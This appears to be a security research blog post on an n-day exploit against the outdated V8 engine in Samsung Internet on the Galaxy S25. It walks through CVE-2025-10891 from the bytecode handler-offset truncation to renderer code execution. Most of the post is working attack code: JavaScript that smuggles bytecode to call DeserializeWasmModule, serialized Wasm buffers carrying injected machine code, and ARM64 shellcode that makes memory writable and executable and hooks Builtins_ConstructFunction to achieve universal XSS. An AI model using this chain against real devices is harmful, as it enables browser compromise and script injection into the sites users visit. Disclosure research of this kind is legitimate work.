Apr 1, 2026

Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25

Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.

Introduction

Software supply chains today are extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.

One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the Crusaders of Rust Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.

Finding the V8 Version

We started by pulling Samsung Internet's APK from the device over adb and inspecting the libraries it shipped with.

After extracting the APK, we searched the lib/ directory for v8::* symbols:

$ grep -r 'v8::' lib/

grep: lib/arm64-v8a/libterrace.so: binary file matches



Only one file matched our search: libterrace.so. We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:

Surprisingly, this 13.6.233.10 version was already six months old at the time, with multiple publicly known bugs affecting it.

Choosing the Bug

We were able to trigger a couple of bugs on our locally compiled d8 matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.

Another one was CVE-2025-10891 - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.

Ignition Bytecode Introduction

V8 initially compiles all JS code to a bytecode format with the Ignition interpreter. This is a simple register-based VM with fixed-size opcodes (and prefix bytes to increase operand width). For instance:

let a = 1;

let b = 0x0fff;

let c = 0x0fffffff;

let d = 0xffffffff;

compiles to

# Load the Smi `1` into the accumulator

0 : 0d 01 LdaSmi [1]

# Store it to register 0

2 : ce Star0

# Load the 2-byte Smi `0xfff` into acc

3 : 00 0d ff 0f LdaSmi.Wide [4095]

# Store it to register 1

7 : cd Star1

# Load the 4-byte Smi `0xfffffff` into acc

8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]

# Store it to register 2

14 : cc Star2

# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded

15 : 13 00 LdaConstant [0]

# Store it to register 3

17 : cb Star3

18 : 0e LdaUndefined

19 : b3 Return
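The width selection visible in this listing can be sketched in a few lines. This is only an illustration and not V8's actual emitter: the helper name `encodeLdaSmi` is hypothetical, the opcode and prefix bytes are copied from the disassembly above (so they are specific to this V8 version), and the 31-bit Smi range assumes pointer compression.

```javascript
// Hypothetical helper mirroring the listing above; byte values are version-specific.
const LDA_SMI = 0x0d;    // LdaSmi opcode as seen in the disassembly
const WIDE = 0x00;       // prefix: 2-byte operands
const EXTRA_WIDE = 0x01; // prefix: 4-byte operands

function encodeLdaSmi(value) {
  // Assumed Smi range with pointer compression: 31-bit signed integers.
  if (!Number.isInteger(value) || value < -(2 ** 30) || value > 2 ** 30 - 1) {
    return null; // not a Smi: a HeapNumber is loaded via LdaConstant instead
  }
  // Little-endian bytes of the operand.
  const le = (v, n) => Array.from({ length: n }, (_, i) => (v >> (8 * i)) & 0xff);
  // Special cases such as LdaZero are ignored in this sketch.
  if (value >= -128 && value <= 127) return [LDA_SMI, ...le(value, 1)];
  if (value >= -32768 && value <= 32767) return [WIDE, LDA_SMI, ...le(value, 2)];
  return [EXTRA_WIDE, LDA_SMI, ...le(value, 4)];
}

for (const v of [1, 0x0fff, 0x0fffffff, 0xffffffff]) {
  const bytes = encodeLdaSmi(v);
  console.log(v, bytes ? bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ") : "constant pool");
}
```

The four inputs are the same values as in the JavaScript snippet above, so the printed bytes can be compared against the disassembly directly.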

Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue "engineering" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.

CVE-2025-10891

The bug is in the handling of try/catch blocks. These are encoded in a function as a list of [start, end) => handler offsets - if an exception is thrown in the given bytecode address range, handler is jumped to.

try {

throw 1;

} catch {

let b = 2;

}

0 : 1b ff f8 Mov <context>, r1

# Start of try block

# ---------------------------------

3 : 0d 01 LdaSmi [1]

5 : b1 Throw

# ---------------------------------

6 : 10 LdaTheHole

7 : b0 SetPendingMessage

# Start of catch handler

8 : 0d 02 LdaSmi [2]

10 : ce Star0

11 : 0e LdaUndefined

12 : b3 Return

Handler Table (size = 16)

from to hdlr (prediction, data)

( 3, 6) -> 6 (prediction=1, data=1)

However, the handler offset is stored in a 28-bit bitfield. If the address of the catch block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.
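To make the truncation concrete, here is a minimal sketch of the arithmetic. It assumes the stored value is simply the low 28 bits of the real offset, as described above; the function name is ours, and the real bitfield packing inside V8 is not reproduced here.

```javascript
// Assumption: only the low 28 bits of the handler offset survive.
const HANDLER_OFFSET_BITS = 28;

function truncatedHandlerOffset(offset) {
  return offset & ((1 << HANDLER_OFFSET_BITS) - 1);
}

// A small offset is unaffected.
console.log(truncatedHandlerOffset(6)); // 6
// An offset just past 2^28 wraps around to the start of the function.
console.log(truncatedHandlerOffset(0x10000008)); // 8
```

In other words, a catch block located beyond 2^28 bytes of bytecode ends up with a handler that points near the beginning of the same function.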

One easy way to generate a large enough function, as suggested in the initial report, is to emit many yield* statements, as that drastically increases the size of the Ignition bytecode.

Exploitation

Constant Smuggling

Our initial approach to exploitation was inspired by the 'shellcode smuggling' technique - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:

let a = -9.255963134931783e61;

let b = -9.255963134931783e61;

let c = -9.255963134931783e61;

let d = -9.255963134931783e61;

These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).

We'll use a similar principle here, although much more limited. With

let a = 0x0693bebe;

We will compile the bytecode:

01 0d be be 93 06 LdaSmi.ExtraWide

We can then jump to the 3rd byte (0xbe) and gain 2 controlled bytes of execution, followed by 0x93 and an offset byte in the range 0x02-0x0f (Jump +[2-15]; here 0x06) to jump into the next constant.
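The byte layout is easy to check by hand. The sketch below uses a hypothetical helper name and the prefix and opcode values from the listing above; it lays out the immediate in little-endian order and slices off the part that gets reinterpreted as bytecode.

```javascript
// Bytes of LdaSmi.ExtraWide for a 32-bit immediate (values from the listing, version-specific).
function ldaSmiExtraWideBytes(imm) {
  const bytes = [0x01, 0x0d]; // ExtraWide prefix, LdaSmi opcode
  for (let i = 0; i < 4; i++) bytes.push((imm >>> (8 * i)) & 0xff);
  return bytes;
}

const encoded = ldaSmiExtraWideBytes(0x0693bebe);
// Entering at index 2 skips the prefix and opcode, so the immediate itself is decoded.
const smuggled = encoded.slice(2);
console.log(smuggled.map((b) => b.toString(16).padStart(2, "0")).join(" ")); // be be 93 06
```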

Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 0-15 resulted in simple one-byte StarX instructions, registers 16-121 resulted in two-byte Star rX instructions, and the next batch resulted in four-byte Star.Wide rX instructions.

With these short jumps, we can actually construct a massive jump slide of constants like 0x8931111:

let a206 = 0x8931111;

let a207 = 0x8931111;

let a208 = 0x8931111;

let a209 = 0x8931111;

let a210 = 0x8931111;

let a211 = 0x8931111;

let a212 = 0x8931111;

Those instructions result in:

00: LdaTrue;

01: LdaTrue;

02: Jump +8; >------------+

04: Star rX + LdaSmi ... |

v--------------------------+

0a: LdaTrue;

0b: LdaTrue;

(The offset of Jump instructions is added to the start of the instruction.)
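The required jump distance follows from the instruction sizes. As a sketch under the layout described above (a 6-byte LdaSmi.ExtraWide followed by one Star of varying length, entry at the third byte, Jump at the fifth), with helper names that are ours:

```javascript
const JUMP = 0x93;     // Jump opcode as it appears in the listings (version-specific)
const LDA_TRUE = 0x11; // filler byte, decoded as LdaTrue in the diagram above

// storeLen: byte length of the Star instruction following each LdaSmi.ExtraWide.
function slideJumpOffset(storeLen) {
  const ldaLen = 6; // prefix + opcode + 4-byte immediate
  const entry = 2;  // index of the first immediate byte within the instruction
  const jumpAt = 4; // index of the Jump opcode within the instruction
  // Distance from the Jump opcode to the entry point of the next constant.
  return ldaLen + storeLen + entry - jumpAt;
}

// Constant whose immediate decodes as: LdaTrue; LdaTrue; Jump +offset.
function slideConstant(storeLen) {
  return slideJumpOffset(storeLen) * 0x1000000 + (JUMP << 16) + (LDA_TRUE << 8) + LDA_TRUE;
}

console.log(slideConstant(4).toString(16)); // 8931111
```

With a 4-byte store the offset is 8, which matches the 0x8931111 constant used for the deep registers above.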

Now, 3 out of the 6 bytes in a LdaSmi.ExtraWide instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.

Exploit Goal

Initially we considered using Star/Ldar instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.

We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to stack pivot and ROP. However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).

Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.

Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.

At this point, we identified an interesting opcode: CallRuntime. Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless --allow-natives-syntax is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: DeserializeWasmModule.

WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any JIT-compiled functions. DeserializeWasmModule/SerializeWasmModule themselves are only used from test functions, and indeed have been removed from recent production V8 builds due to how abusable this functionality is.

However, calling this opcode represented a significant challenge:

CallRuntime <func-id> <args> <argc>

Where func-id is a 2-byte function ID, args is the index of the last register passed and argc is the number of arguments passed (e.g. passing r0, r1 and r2 would be encoded as <r2> <3>).

This requires 5 bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS code.

Better Bytecode Control

Luckily, arithmetic instructions in Ignition carry a 'feedback vector slot' operand, which refers to profiling information stored for subsequent optimizations by Turbofan. Observationally, for the AddSmi instruction, it represents the number of operations performed on the target value so far.

For example, we can look at the below Ignition disassembly:

2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]

2006 : cd Star1

2007 : 00 1b ff ff 1d ff Mov.Wide <context>, r220

2013 : 0b f8 Ldar r1

2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]

2025 : 0b f8 Ldar r1

2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]

2037 : 0b f8 Ldar r1

2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]

2049 : 0b f8 Ldar r1

2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]

2061 : 0b f8 Ldar r1

2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]

We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through AddSmi.ExtraWide, we can control almost 8 bytes (the immediate is limited by the Smi range) given enough addition instructions.
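A quick way to reason about this is to convert between a slot index and its four operand bytes. The sketch below assumes, as the listing above suggests, that the n-th addition receives slot n; the function names are hypothetical.

```javascript
// Little-endian bytes of the 4-byte feedback slot operand of AddSmi.ExtraWide.
function slotOperandBytes(slot) {
  return [0, 1, 2, 3].map((i) => (slot >>> (8 * i)) & 0xff);
}

// Inverse: the slot index (and hence the number of additions) that yields the given bytes.
function slotForBytes(b) {
  return b[0] + b[1] * 0x100 + b[2] * 0x10000 + b[3] * 0x1000000;
}

console.log(slotOperandBytes(5)); // [ 5, 0, 0, 0 ]
console.log(slotForBytes([0x02, 0x93, 0x05, 0x00])); // 365314
```

Choosing the last four smuggled bytes therefore comes down to choosing how many additions precede the final one.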

Eventually, we can reach a stage like this:

4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]

If you skip the first two bytes, you have:

- CallRuntime (0x6c) to DeserializeWasmModule (0x0266), starting from register a2 (0x4) with 2 arguments (0x2). This becomes the call DeserializeWasmModule(a2, a1)

- a Jump instruction
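The split of the ten AddSmi.ExtraWide bytes into the two smuggled instructions can be written out as a small decoder. Field names here are ours, and the layout is taken from the CallRuntime description earlier in this section.

```javascript
// Interpret the tail of an AddSmi.ExtraWide instruction as CallRuntime followed by Jump.
function decodeSmuggledTail(instr) {
  const tail = instr.slice(2); // skip the ExtraWide prefix and the AddSmi opcode
  return {
    opcode: tail[0],                      // 0x6c = CallRuntime in this build
    functionId: tail[1] | (tail[2] << 8), // 2-byte little-endian runtime function ID
    register: tail[3],                    // register operand
    argCount: tail[4],                    // low byte of the feedback slot
    nextOpcode: tail[5],                  // 0x93 = Jump
    jumpOffset: tail[6],
  };
}

const addSmi = [0x01, 0x4b, 0x6c, 0x66, 0x02, 0x04, 0x02, 0x93, 0x05, 0x00];
console.log(decodeSmuggledTail(addSmi));
```

Note that the first four tail bytes come from the immediate and the remaining ones from the feedback slot, which is why both the constant and the number of additions matter.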

Returning Back to JS

After that call, the result is stored in the accumulator. Since this function is an async generator, we have to yield the result, but that results in a long series of instructions that we can't possibly smuggle.

The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:

try {

${'a1 + 0xa931111;'.repeat(0x059302 - 1)}

a1 + 0x0402666c;

throw 0x393e91a;

} catch (e) {

console.log("foo");

yield a16;

}

Starting from the final AddSmi

4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]

4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]

4385790 : b1 Throw

4385791 : 00 1a 1a ff Star.Wide r223

The smuggled jump in AddSmi will redirect us to 1a e9 93 03, which results in:

- Star r16 (store the accumulator to r16)

- Jump past the throw into the relevant catch code

This will bring us nicely to the final yield a16, and we now have a deserialized Wasm module with our own arbitrary machine code.
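The throw constant can be derived the same way as the slide constants. The sketch below infers the single-byte register encoding from the listings in this post (r1 appears as 0xf8 and r16 as 0xe9), so treat the formula as an observation about this build rather than a documented rule; the helper names are ours.

```javascript
const STAR = 0x1a;    // Star opcode as seen in the Star.Wide listing (version-specific)
const JUMP_OP = 0x93; // Jump opcode as seen in the listings

// Single-byte register operand inferred from the listings: r1 -> 0xf8, r16 -> 0xe9.
function registerOperand(index) {
  return (0xf9 - index) & 0xff;
}

// Constant whose immediate decodes as: Star r<regIndex>; Jump +jumpOffset.
function starThenJumpConstant(regIndex, jumpOffset) {
  return jumpOffset * 0x1000000 + (JUMP_OP << 16) + (registerOperand(regIndex) << 8) + STAR;
}

console.log(starThenJumpConstant(16, 3).toString(16)); // 393e91a
```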

Executing Shellcode

To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:

var wasm_code = new Uint8Array([

0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,

0, 0, 10, 4, 1, 2, 0, 11,

]);

var mod = new WebAssembly.Module(wasm_code);

var inst = new WebAssembly.Instance(mod);

var func = inst.exports.shell;

%WasmTierUpFunction(func);

var serialized = %SerializeWasmModule(mod);

let result = new Uint8Array(serialized);

console.log('[' + result.join(', ') + ']');

This produces the following output:

[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]

The bytes 85, 72, 137, 229, ... correspond to the x86-64 function prologue (push rbp; mov rbp, rsp). We replace the first byte with 0xcc (the int3 opcode), and use this modified buffer as the serialized input to DeserializeWasmModule:

(async () => {

const wasm_code = new Uint8Array([

0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,

0, 0, 10, 4, 1, 2, 0, 11,

]);

const buffer = new Uint8Array([

147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,

0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,

0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,

195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,

]);

let r = bug(wasm_code, buffer.buffer);

const result = (await r.next()).value;

const wasm_instance = new WebAssembly.Instance(result);

const f = wasm_instance.exports.shell;

f();

})();

Running this in a debugger shows the expected breakpoint:

Thread 1 "d8" received signal SIGTRAP, Trace/breakpoint trap.

0x00002ae46bfc1841 in ?? ()

────────────────────────────────────────────────────────────────────────────

0x2ae46bfc183c add BYTE PTR [rax], al

0x2ae46bfc183e add BYTE PTR [rax], al

0x2ae46bfc1840 int3

→ 0x2ae46bfc1841 mov rbp, rsp
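The byte replacement used for this test can also be scripted instead of edited by hand. A minimal sketch, assuming the serialized module is available as a plain array of byte values and that the first occurrence of the prologue bytes is the function we want (both helper names are ours):

```javascript
// Find the first occurrence of `needle` in `bytes` (plain arrays of byte values).
function findSequence(bytes, needle) {
  for (let i = 0; i + needle.length <= bytes.length; i++) {
    if (needle.every((b, j) => bytes[i + j] === b)) return i;
  }
  return -1;
}

// Return a copy in which the first byte of the x86-64 prologue is replaced by int3 (0xcc).
function patchPrologueWithInt3(serialized) {
  const prologue = [0x55, 0x48, 0x89, 0xe5]; // push rbp; mov rbp, rsp
  const at = findSequence(serialized, prologue);
  if (at < 0) throw new Error("prologue not found");
  const patched = serialized.slice();
  patched[at] = 0xcc;
  return patched;
}

console.log(patchPrologueWithInt3([0, 2, 85, 72, 137, 229, 106, 8]));
```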

Porting to Android

The serialized x86-64 code can’t be used on the device because the architecture differs, and DeserializeWasmModule fails. We cross-compiled d8 for arm64 and serialized the module there, but this still didn’t work on the device and DeserializeWasmModule returned undefined.

Instead, we modified the bytecode to call SerializeWasmModule directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls DeserializeWasmModule.

try {

${'a1 + 0xa931111;'.repeat(0x059301 - 1)}

a1 + 0x03027a6c;

throw 0x393e71a;

} catch (e) {

console.log("foo");

yield a16;

}

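Here, a1 + 0x03027a6c generates the bytes 01 4b 6c 7a 02 03, where 0x6c is the CallRuntime opcode, 0x027a is the function ID of SerializeWasmModule, and 0x03 is the register index holding its first argument. The repeat count is lowered to 0x059301 so that the low byte of the feedback slot, which is decoded as the argument count, becomes 0x01.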
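Both addition constants used in this post follow the same pattern, which can be sketched as below. The opcode value is the one from the listings and is specific to this V8 build, and the helper names are hypothetical.

```javascript
const CALL_RUNTIME = 0x6c; // opcode value from the listings (version-specific)

// Immediate for `a1 + <imm>` whose bytes decode as: CallRuntime <functionId> <register>.
function callRuntimeImmediate(functionId, registerOperand) {
  return registerOperand * 0x1000000 + (functionId << 8) + CALL_RUNTIME;
}

// The argument count byte is the low byte of the feedback slot of that addition.
function argCountFromSlot(slot) {
  return slot & 0xff;
}

console.log(callRuntimeImmediate(0x027a, 0x03).toString(16)); // 3027a6c
console.log(callRuntimeImmediate(0x0266, 0x04).toString(16)); // 402666c
console.log(argCountFromSlot(0x059301), argCountFromSlot(0x059302)); // 1 2
```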

Our earlier JavaScript snippet that serialized the wasm module used two native calls: SerializeWasmModule and WasmTierUpFunction. To avoid patching the bytecode again to invoke WasmTierUpFunction, we can force Turbofan to compile the target function like this:

// %WasmTierUpFunction(func);

for (let i = 0; i < 0x100000; i++) {

func();

}

Finally, running this code on the device:

(async () => {

var wasm_code = new Uint8Array([

0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,

0, 0, 10, 4, 1, 2, 0, 11,

]);

var mod = new WebAssembly.Module(wasm_code);

var inst = new WebAssembly.Instance(mod);

var func = inst.exports.shell;

// %WasmTierUpFunction(func);

for (let i = 0; i < 0x100000; i++) {

func();

}

let r = bug(mod);

const result = (await r.next()).value;

console.log(result);

let result_bytes = new Uint8Array(result);

console.log('[' + result_bytes.join(', ') + ']');

})();





We get the serialized bytes:

We can now embed this output into the original bytecode that calls DeserializeWasmModule:

(async () => {

const wasm_code = new Uint8Array([

0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,

0, 0, 10, 4, 1, 2, 0, 11,

]);

const buffer = new Uint8Array([

146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,

0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,

0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,

213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,

255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,

0, 0, 0, 0, 0, 92, 50, 162, 0,

]);

let r = bug(wasm_code, buffer.buffer);

const result = (await r.next()).value;

console.log('DeserializeWasmModule result: ' + result);

const wasm_instance = new WebAssembly.Instance(result);

const f = wasm_instance.exports.shell;

console.log(f);

})();

And this time, it works as expected:

Achieving Universal XSS

At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this talk from Tencent Security and research article from InterruptLabs.

Unlike a normal XSS, a UXSS, or universal XSS, is a client-side browser exploit that enables arbitrary JavaScript injection into pages regardless of which site they belong to. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android has a weaker version of this mitigation - only sites with logins and COOP headers get their own process. This means that the majority of webpages share a renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!

To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called Builtins_ConstructFunction, making it a natural target.

Our goal is for Builtins_ConstructFunction to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:

- The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload

- After finishing, the mmap-ed shellcode restores the original instructions in Builtins_ConstructFunction

- The mmap-ed shellcode then returns to the beginning of Builtins_ConstructFunction, which now proceeds normally
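The control flow of this one-shot hook is easier to see in a high-level analogy. The toy model below is plain JavaScript and has nothing to do with the real memory patching: `table` stands in for code memory, `name` for the hooked function, and all names are made up for illustration.

```javascript
// Toy model of a self-removing hook: payload first, then restore, then re-enter the original.
function installOneShotHook(table, name, payload) {
  const original = table[name];
  table[name] = function (...args) {
    payload();                         // 1. run the injected payload
    table[name] = original;            // 2. restore the original entry
    return original.apply(this, args); // 3. continue in the original from its start
  };
}

const builtins = { construct: (x) => x * 2 };
const log = [];
installOneShotHook(builtins, "construct", () => log.push("payload"));
console.log(builtins.construct(21), builtins.construct(21), log);
```

The second call goes straight to the original function, mirroring how the patched builtin behaves normally once the shellcode has restored it.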

The ARM64 shellcode implementing this looks as follows:

// get return addr to x0

ldr x0, [sp, #0x18]

// strip pac signature from return address

.arch armv8.3-a; xpaci x0

// store x5 = Builtins_ConstructFunction

movz x1, #0x610c

sub x0, x0, x1

mov x5, x0

// store x4 = page aligned ConstructFunction

movz x1, #0xf000

movk x1, #0xffff, lsl #16

movk x1, #0xffff, lsl #32

and x4, x5, x1

// mprotect page aligned ConstructFunction RWX

mov x0, x4

mov x1, #0x2000

mov x2, #0x7

mov x8, #226

svc #0

mov x6, x5

// mmap RWX for jump dest (uxss_sc)

mov x0, #0

mov x1, #0x1000

mov x2, #0x7

mov x3, #34

mov x4, #-1

mov x5, #0

mov x8, #222

svc #0

mov x5, x0

// at this point:

// x6 = Builtins_ConstructFunction

// x5 = mmap page for uxss_sc

// write uxss_sc to mmaped rwx page

{write_sc(uxss_sc, "x5")}

// wipe from cache

mov x0, x5

{WIPE_CACHE}

// patch Builtins_ConstructFunction

{write_sc(new_compile_instrs, "x6")}

// and add a pointer to uxss_sc just above new instructions

str x5, [x6, #{5 * INSTR_SIZE}]

// wipe from cache

mov x0, x6

{WIPE_CACHE}

In the snippet above, new_compile_instrs refers to the instructions written to the beginning of Builtins_ConstructFunction that invoke the uxss_sc mmap-ed shellcode:

bti c

// store registers that will be overwritten

stp x15, lr, [sp, #-16]!

// get current pc into x15

adr x15, .

// load the uxss_sc pointer saved just above new instructions

ldr x15, [x15, #{3 * INSTR_SIZE}]

// jump to uxss_sc

blr x15
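The offsets in this stub and in the patching code can be cross-checked with a little arithmetic. The sketch assumes INSTR_SIZE is 4, since every AArch64 instruction is 4 bytes wide; the variable names are ours.

```javascript
const INSTR_SIZE = 4; // assumption: fixed 4-byte AArch64 instructions

const stub = [
  "bti c",
  "stp x15, lr, [sp, #-16]!",
  "adr x15, .",
  "ldr x15, [x15, #imm]",
  "blr x15",
];

// The uxss_sc pointer is stored right after the last stub instruction.
const pointerSlot = stub.length * INSTR_SIZE;
// `adr x15, .` yields the address of the adr instruction itself.
const adrAddress = stub.indexOf("adr x15, .") * INSTR_SIZE;
// Displacement the ldr needs to reach the pointer slot from there.
const ldrImmediate = pointerSlot - adrAddress;
// blr sets lr to the address following it.
const returnAddress = (stub.indexOf("blr x15") + 1) * INSTR_SIZE;

console.log({ pointerSlot, ldrImmediate, returnAddress });
```

This gives a pointer slot at 5 * INSTR_SIZE, a load displacement of 3 * INSTR_SIZE, and a return address of 5 * INSTR_SIZE past the function start, which is why the epilogue later subtracts 5 * INSTR_SIZE from the saved lr.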

uxss_sc is the mmap-ed shellcode invoked by the patched Builtins_ConstructFunction to execute our XSS payload. Its prologue looks like this:

bti c

// Save full register context

stp x0, x1, [sp, #-16]!

stp x2, x3, [sp, #-16]!

stp x4, x5, [sp, #-16]!

stp x6, x7, [sp, #-16]!

stp x8, x9, [sp, #-16]!

stp x10, x11, [sp, #-16]!

stp x12, x13, [sp, #-16]!

stp x14, x15, [sp, #-16]!

stp x16, x17, [sp, #-16]!

stp x18, x19, [sp, #-16]!

stp x20, x21, [sp, #-16]!

stp x22, x23, [sp, #-16]!

stp x24, x25, [sp, #-16]!

stp x26, x27, [sp, #-16]!

stp x28, x29, [sp, #-16]!

str lr, [sp, #-16]!

All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.

The epilogue restores all saved registers, restores the original instructions in Builtins_ConstructFunction, and then returns execution to its beginning:

// pop the lr saved in the prologue (points just past the blr in the patched builtin)

ldr lr, [sp], #16

// move lr to the beginning of Builtins_ConstructFunction

sub lr, lr, #{5 * INSTR_SIZE}

// restore original instructions of Builtins_ConstructFunction

{write_sc(orig_compile_instrs, "lr")}

// wipe from cache

mov x0, lr

{WIPE_CACHE}

// restore original registers

ldp x28, x29, [sp], #16

ldp x26, x27, [sp], #16

ldp x24, x25, [sp], #16

ldp x22, x23, [sp], #16

ldp x20, x21, [sp], #16

ldp x18, x19, [sp], #16

ldp x16, x17, [sp], #16

ldp x14, x15, [sp], #16

ldp x12, x13, [sp], #16

ldp x10, x11, [sp], #16

ldp x8, x9, [sp], #16

ldp x6, x7, [sp], #16

ldp x4, x5, [sp], #16

ldp x2, x3, [sp], #16

ldp x0, x1, [sp], #16

